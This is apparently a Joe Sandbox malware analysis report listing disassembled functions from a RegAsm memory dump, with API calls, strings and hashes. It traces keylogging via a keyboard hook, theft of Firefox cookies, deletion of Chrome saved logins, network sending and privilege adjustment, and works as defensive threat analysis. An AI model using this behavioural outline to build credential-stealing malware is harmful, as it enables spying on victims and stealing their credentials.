                                                                                Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 3587775597-0
                                                                                • Opcode ID: bd90adb3c9ffda68c4d3d743e1fab383d2d9aba86fe3d43c12d646017195f98b
                                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                • Opcode Fuzzy Hash: bd90adb3c9ffda68c4d3d743e1fab383d2d9aba86fe3d43c12d646017195f98b
                                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                • String ID: JD$JD$JD
                                                                                • API String ID: 745075371-3517165026
                                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 1164774033-405221262
                                                                                • Opcode ID: 78e91e1412a60729a935b4267de3637b6f1e72dbfc3822a78d199d5eb66ad251
                                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                • Opcode Fuzzy Hash: 78e91e1412a60729a935b4267de3637b6f1e72dbfc3822a78d199d5eb66ad251
                                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Find$CreateFirstNext
                                                                                • String ID: 8SG$PXG$PXG$p54$NG
                                                                                • API String ID: 341183262-873243826
                                                                                • Opcode ID: eb4b6eba06b30b548788c5b2eb1276ea41de61378780079a625ef76f4ca5169a
                                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                • Opcode Fuzzy Hash: eb4b6eba06b30b548788c5b2eb1276ea41de61378780079a625ef76f4ca5169a
                                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • GetMessageA.USER32 ref: 0040A376
                                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                                • DispatchMessageA.USER32 ref: 0040A390
                                                                                Strings
                                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                • String ID: Keylogger initialization failure: error
                                                                                • API String ID: 3219506041-952744263
                                                                                • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                • String ID:
                                                                                • API String ID: 1888522110-0
                                                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                • API String ID: 2127411465-314212984
                                                                                • Opcode ID: 21d2bd2d6723997ffbf1e0732cb0f686b590d152505873c50cb7564f0e434579
                                                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                • Opcode Fuzzy Hash: 21d2bd2d6723997ffbf1e0732cb0f686b590d152505873c50cb7564f0e434579
                                                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00449292
                                                                                • _free.LIBCMT ref: 004492B6
                                                                                • _free.LIBCMT ref: 0044943D
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                • _free.LIBCMT ref: 00449609
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                • String ID:
                                                                                • API String ID: 314583886-0
                                                                                • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                • API String ID: 1589313981-2876530381
                                                                                • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                                Strings
                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                • UserProfile, xrefs: 0040BA59
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                • API String ID: 2018770650-1062637481
                                                                                • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 3534403312-3733053543
                                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00C24830,00000010), ref: 004048E0
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                • String ID:
                                                                                • API String ID: 1824512719-0
                                                                                • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                • String ID:
                                                                                • API String ID: 276877138-0
                                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceA.KERNEL32 ref: 0041B54A
                                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID: SETTINGS
                                                                                • API String ID: 3473537107-594951305
                                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
                                                                                • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
